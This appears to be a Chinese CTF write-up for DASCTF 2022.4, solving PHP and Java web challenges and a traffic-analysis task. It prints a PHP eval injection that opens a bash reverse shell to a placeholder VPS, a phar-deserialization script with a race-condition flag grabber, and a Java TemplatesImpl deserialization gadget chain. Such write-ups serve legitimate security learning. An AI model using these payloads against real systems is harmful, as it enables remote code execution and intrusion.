DASCTF 2022.4

Web

warmup_php

查看主页源码如下

<?php
spl_autoload_register(function($class){
    require("./class/".$class.".php");
});
highlight_file(__FILE__);
error_reporting(0);
$action = $_GET['action'];
$properties = $_POST['properties'];
class Action{

    public function __construct($action,$properties){

        $object=new $action();
        foreach($properties as $name=>$value)
            $object->$name=$value;
        $object->run();
    }
}

new Action($action,$properties);
?>

这里会自动注册class目录下的类文件,可以传入变量访问所有类文件下的run函数,同时还会设置成员变量值。

下载题目附件,查看class目录下所有php文件,可以发现Base.php下有

    public function evaluateExpression($_expression_,$_data_=array())
    {
        if(is_string($_expression_))
        {
            extract($_data_);
            return eval('return '.$_expression_.';');
        }
        else
        {
            $_data_[]=$this;
            return call_user_func_array($_expression_, $_data_);
        }
    }

eval中的return是用字符串拼接的方式将变量拼起来的,这里可以构造

同时还可以发现,所有php下只有一个run方法

abstract class ListView extends Base
{

    public $tagName='div';
    public $template;

    public function run()
    {
        echo "<".$this->tagName.">\n";
        $this->renderContent();
        echo "<".$this->tagName.">\n";
    }

    public function renderContent()
    {
        ob_start();
        echo preg_replace_callback("/{(\w+)}/",array($this,'renderSection'),$this->template);
        ob_end_flush();
    }

    protected function renderSection($matches)
    {
        $method='render'.$matches[1];
        if(method_exists($this,$method))
        {
            $this->$method();
            $html=ob_get_contents();
            ob_clean();
            return $html;
        }
        else
            return $matches[0];
    }
}

只要template变量是{数字、字母}组成的,那么就回调下面的renderSection函数,matches就是templdate变量的值,由于TestView这个类继承了ListView这个抽象类。所以,如果实例化TestView类,上面的$this->method()可以调用所有的以render开头的函数。这里直接定位到

    public function renderTableBody()
    {
        $data=$this->data;
        $n=count($data);
        echo "<tbody>\n";

        if($n>0)
        {
            for($row=0;$row<$n;++$row)
                $this->renderTableRow($row);
        }
        else
        {
            echo '<tr><td colspan="'.count($this->columns).'" class="empty">';

            echo "</td></tr>\n";
        }
        echo "</tbody>\n";
    }

利用$this->renderTableRow()调用evaluateExpression函数即可完成调用链。

    public function renderTableRow($row)
    {
        $htmlOptions=array();
        if($this->rowHtmlOptionsExpression!==null)
        {
            $data=$this->data[$row];
            $options=$this->evaluateExpression($this->rowHtmlOptionsExpression,array('row'=>$row,'data'=>$data));
            if(is_array($options))
                $htmlOptions = $options;
        }

GET传参实例化TestView类,再POST传参即可

properties[template]:{TableBody}
properties[rowHtmlOptionsExpression]:system("bash -c 'bash -i >& /dev/tcp/VPS/6666 0>&1'")
properties[data][0]:123

在这里插入图片描述

反弹shell读flag即可

在这里插入图片描述

soeasyphp

题目给出dockerfile

FROM php:7.2.3-fpm
COPY files /tmp/files/
COPY src /var/www/html/
COPY flag /flag
RUN chown -R root:root /var/www/html/ && \
chmod -R 755 /var/www/html && \
chown -R www-data:www-data /var/www/html/uploads && \
sed -i 's/deb.debian.org/mirrors.aliyun.com/g' /etc/apt/sources.list && \
sed -i '/security/d' /etc/apt/sources.list && \
apt-get update && \
apt-get install nginx -y && \
/bin/mv -f /tmp/files/default /etc/nginx/sites-available/default && \
gcc /tmp/files/copyflag.c -o /copyflag && \
chmod 4711 /copyflag && \
rm -rf /tmp/files && \
rm -rf /var/lib/apt/lists/* && \
chmod 700 /flag
CMD nginx&&php-fpm
EXPOSE 80

查看网页源代码,可以用png参数指向的文件覆盖uploads/head.png的内容。

<img width="50px" height="50px" src="uploads/head.png"/>
<br/>
<form action="upload.php" method="post" enctype="multipart/form-data">
    <p><input type="file" name="file"></p>
    <p><input type="submit" value="上传头像"></p>
</form>
<br/>
<form action="edit.php" method="post" enctype="application/x-www-form-urlencoded">
    <p><input type="text" name="png" value="1.png" hidden="1"></p>
    <p><input type="text" name="flag" value="flag{x}" hidden="1" ></p>
<!--    <p><input type="submit" value="更换头像"></p> -->
</form>

读取源码

//edit.php
<?php
ini_set("error_reporting","0");
class flag{
    public function copyflag(){
        exec("/copyflag");    //以root权限复制/flag 到 /tmp/flag.txt,并chown www-data:www-data/tmp/flag.txt
        echo "SFTQL";
    }
    public function __destruct(){
        $this->copyflag();
    }
}

function filewrite($file,$data){
        unlink($file);
        file_put_contents($file, $data);
}

if(isset($_POST['png'])){
    $filename = $_POST['png'];
    if(!preg_match("/:|phar|\/\/|php/im",$filename)){
        $f = fopen($filename,"r");
        $contents = fread($f, filesize($filename));
        if(strpos($contents,"flag{") !== false){
            filewrite($filename,"Don't give me flag!!!");
        }
    }

    if(isset($_POST['flag'])) {
        $flag = (string)$_POST['flag'];
        if ($flag == "Give me flag") {
            filewrite("/tmp/flag.txt", "Don't give me flag");
            sleep(2);
            die("no no no !");
        } else {
            filewrite("/tmp/flag.txt", $flag);
        }
        $head = "uploads/head.png";
        unlink($head);
        if (symlink($filename, $head)) {
            echo "鎴愬姛鏇存崲澶村儚";
        } else {
            unlink($filename);
            echo "非正常文件,已被删除";
        };
    }
}


//upload.php
<?php
if (!isset($_FILES['file'])) {
    die("璇蜂笂浼犲ご鍍�");
}

$file = $_FILES['file'];
$filename = md5("png".$file['name']).".png";
$path = "uploads/".$filename;
if(move_uploaded_file($file['tmp_name'],$path)){
    echo "涓婁紶鎴愬姛锛� ".$path;
};

由于上面的代码有__destruct魔术方法和文件操作函数file_put_contentsunlink的参数可控,但整个代码里没有unserialize函数。所以自然想到利用phar反序列化

<?php
class flag{
    public function copyflag(){
        exec("/copyflag");
        echo "SFTQL";
    }
    public function __destruct(){
        $this->copyflag();
    }
}
    $a = new flag();
    @unlink("phar.phar");
    $phar = new Phar("phar.phar");
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata($a);
    $phar->addFromString("a.txt", "a");
    $phar->stopBuffering();
?>

在这里插入图片描述

但是file_put_contents有过滤,就得调用unlink函数。file添加脏数据让symlink函数报错即可进入unlink函数,这时使用phar协议就可以读取到

import requests
url = "http://c2ea5fdd-954e-43e1-b5eb-6376940b2074.node4.buuoj.cn:81/"
sess = requests.Session()
sess.headers = {"content-type":"application/x-www-form-urlencoded"}
url1 = url + "edit.php"
data = {"png":"phar://uploads/d7eb04b5bf59f60ce50fa61dd63ccac9.png/"+"m"*6000,"flag":"flag"}
print(sess.post(url1,data).text)

这里需要让symlink函数报错,绕过symlink之后,flag就会被写入/tmp/flag.txt(注释里有写)。

在这里插入图片描述

但我们在读取/tmp/flag.txt时,后端又会将我们post传入的flag写入/tmp/flag.txt,从而覆盖掉flag,因此这里也需要条件竞争读取flag

import requests
import threading
sess = requests.session()
url = "http://c2ea5fdd-954e-43e1-b5eb-6376940b2074.node4.buuoj.cn:81/"
headurl = url + "uploads/head.png"
editurl = url + "edit.php"
def getFlag():
    sess.post(editurl, data={"png": "/tmp/flag.txt", "flag": ""})

if __name__ == "__main__":
    for s in range(50):
        sess.post(editurl, data={"png":"phar://uploads/d7eb04b5bf59f60ce50fa61dd63ccac9.png/"+"m"*6000, "flag": ""})
        t2 = threading.Thread(target=getFlag, args=())
        t2.start()
    while True:
        flag = sess.get(headurl).text
        if "flag" in flag:
            print(flag) 
            break
warmup-java

反编译jar包,查看MyInvocationHandler类

import java.io.Serializable;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;

public class MyInvocationHandler implements InvocationHandler, Serializable {
  private Class type;
  
  public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
    Method[] methods = this.type.getDeclaredMethods();
    Method[] var5 = methods;
    int var6 = methods.length;
    for (int var7 = 0; var7 < var6; var7++) {
      Method xmethod = var5[var7];
      xmethod.invoke(args[0], new Object[0]);
    } 
    return null;
  }
}

可以看到这里使用动态代理InvocationHandler获取

动态代理https://www.bilibili.com/video/BV1WE411d7Dv?p=19

简单编写一下代码,看看invoke的触发和动态代理类的使用

public class Client {
    public static void main(String[] args){
        Utils utils = new Utils();
        InvocationHandler invocationHandler = new MyInvocationHandler();
        Class<?> cls = utils.getClass();
        Object proxy = Proxy.newProxyInstance(cls.getClassLoader(), cls.getInterfaces(), invocationHandler);
        System.out.println(proxy.getClass().getInterfaces().toString()+", ");
        Method[] methods=proxy.getClass().getDeclaredMethods();
        for(Method method:methods){
            System.out.print(method.getName()+", ");
        }
        proxy.equals(null);  //调用其他函数也会执行invoke方法,会有空指针异常
    }
}

可以看到要是独自构造poc还是很难的

看看博客:https://forum.butian.net/share/1538

反编译出的代码加上构造函数,否则上面声明的type会报空指针

    public MyInvocationHandler(Class type) {
        this.type = type;
    }

抄个payload

package com.example.warmup;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.xalan.xsltc.compiler.Template;
import ysoserial.payloads.util.Reflections;
import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ObjectInputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Proxy;
import java.math.BigInteger;
import java.util.*;
public class exp {
    public static class StubTransletPayload extends AbstractTranslet {
        public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
        }
        public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
        }
    }

    public static void main(String[] args) throws Exception {
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath((new ClassClassPath(StubTransletPayload.class)));
        CtClass clazz = pool.get((StubTransletPayload.class.getName()));
        String cmd = "java.lang.Runtime.getRuntime().exec(\"calc.exe\");";
        clazz.makeClassInitializer().insertAfter(cmd);
        clazz.setName("sp4c1ous");
        TemplatesImpl tmplates = new TemplatesImpl();
        setFieldValue(tmplates, "_bytecodes", new byte[][]{clazz.toBytecode()});
        setFieldValue(tmplates, "_name", "HelloTemplatesTmpl");
        setFieldValue(tmplates, "_tfactory", new TransformerFactoryImpl());
        Field name = Reflections.getField(tmplates.getClass(), "_name");
        Reflections.setAccessible(name);
        Reflections.setFieldValue(tmplates, "_name", "s");
        Reflections.setFieldValue(tmplates, "_tfactory", new TransformerFactoryImpl());
        MyInvocationHandler s = new MyInvocationHandler(Templates.class);
        Comparator comparator = (Comparator) Proxy.newProxyInstance(exp.class.getClassLoader(), new Class[]{Comparator.class}, s);
        PriorityQueue<Object> queue = new PriorityQueue(2);
        queue.add(1);
        queue.add(1);
        Object[] queueArray = (Object[]) (ysoserial.payloads.util.Reflections.getFieldValue(queue, "queue"));
        queueArray[0] = tmplates;
        Field field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
        field.setAccessible(true);
        field.set(queue, comparator);
        System.out.print(Utils.objectToHexString(queue));
        String data = Utils.objectToHexString(queue);
        new ObjectInputStream(new ByteArrayInputStream(Utils.hexStringToBytes(data))).readObject();
    }

    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
}

MISC

SimpleFlow

查看流量,找到最后拿到flag的报文

在这里插入图片描述

很容易发现是一个zip文件,ctrl shift X导出对应zip文件分组字节流,去掉蚁剑添加的eb327956字段

在这里插入图片描述

找到报文段

在这里插入图片描述

解码字段Y2QgIi9Vc2Vycy9jaGFuZy9TaXRlcy90ZXN0Ijt6aXAgLVAgUGFTc1ppUFdvckQgZmxhZy56aXAgLi4vZmxhZy50eHQ7ZWNobyBbU107cHdkO2VjaG8gW0Vd

即可获得密码PaSsZiPWorD

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值